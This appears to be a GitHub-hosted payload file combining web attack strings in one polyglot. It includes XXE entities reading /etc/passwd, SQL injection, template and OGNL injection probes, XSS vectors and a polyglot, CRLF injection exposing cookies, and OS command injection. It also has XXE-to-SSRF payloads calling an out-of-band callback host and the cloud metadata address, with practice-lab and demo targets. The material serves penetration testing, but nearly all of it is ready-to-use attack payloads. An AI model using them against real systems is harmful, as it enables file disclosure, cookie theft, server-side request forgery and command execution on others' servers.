-
Notifications
You must be signed in to change notification settings - Fork 3
/
XSS_SSTI_SQLI_XXE_in_One.txt
28 lines (23 loc) · 2.77 KB
/
XSS_SSTI_SQLI_XXE_in_One.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?xml version="1.0" encoding="UTF-8" ?><!-- 'or 1=1--><!-- "><%=7*7%>{{7*7}}%{48+1} --><!DOCTYPE test [ <!ENTITY x SYSTEM "file:///etc/passwd">]><stockCheck><productId>&x;</productId><storeId>1</storeId><![CDATA[<s><svg/onload=prompt(5);>]]></stockCheck>
SQLi:'or 1=1--><!-- [http://demo.testfire.net/login.jsp]
SSTI:<%=7*7%>{{7*7}}
OGNL injection:%{48+1}
XXE: <?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE test [ <!ENTITY x SYSTEM "file:///etc/passwd">]><stockCheck><productId>&x;</productId><storeId>1</storeId><![CDATA[<s>]]></stockCheck>
XSS:<svg/onload=prompt(5);> [http://demo.testfire.net/search.jsp?query=%3Csvg%2Fonload%3Dprompt%285%29%3B%3E] [https://portswigger-labs.net/xss/xss.php?x=%3Csvg/onload=prompt(5);%3E]
SSTI:{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}
Command injection: ;echo "<svg/onload=alert(1)>" > /var/www/html/x.html;# xx 1/n
CRLF to XSS: %0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
XSS:<details+ontoggle=alert(1)>щ#:~:text=щ [https://portswigger-labs.net/xss/xss.php?x=%3Cdetails+ontoggle=write(1)%3E%D1%89#:~:text=%D1%89]
XSS polygloth: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
[https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot]
Open-redirect:&url=https://c9bc2lb4668eb9k38nugxpxh16fx43dda.oast.online/?s=domain
XXE to SSRF:<!DOCTYPE foo [<!ENTITY ssrf SYSTEM "https://c9bc2lb4668eb9k38nugxpxh16fx43dda.oast.online/?s=domain"> ]>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
SSRF
<?xml version="1.0" encoding="UTF-8" ?><!-- 'or 1=1--><!-- "><%=7*7%>{{7*7}}%{48+1} --><!DOCTYPE test [ <!ENTITY x SYSTEM "https://c9bc2lb4668eb9k38nugxpxh16fx43dda.oast.online">]><stockCheck><productId>&x;</productId><storeId>1</storeId><![CDATA[<s><svg/onload=prompt(5);>]]></stockCheck>
<?xml version="1.0" encoding="UTF-8" ?><!-- 'or 1=1--><!-- "><%=7*7%>{{7*7}}%{48+1} --><!DOCTYPE test [ <!ENTITY x SYSTEM "file:///etc/passwd">]><stockCheck><productId>&x;</productId><storeId>1</storeId><![CDATA[<s><svg/onload=prompt(5);>]]></stockCheck>
OS Command Injection productId=1&storeId=1|whoami&%7C%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%20%
3F%3E%3C%21--%20%27or%201%3D1--%3E%3C%21--%20%22%3E%3C%25%3D7%2A7%25%3E%7B%7B7%2A7%7D%7D%25%7B48%2B1%7D%20--%3E%3C%21DOC
TYPE%20test%20%5B%20%3C%21ENTITY%20x%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3CstockCheck%3E%3CproductId%
3E%26x%3B%3C%2FproductId%3E%3CstoreId%3E1%3C%2FstoreId%3E%3C%21%5BCDATA%5B%3Cs%3E%3Csvg%2Fonload%3Dprompt%285%29%3B%3E%5
D%5D%3E%3C%2FstockCheck%3E' [https://ac8d1fe81f7c2b1cc05c3e7900b000b9.web-security-academy.net/product?productId=1]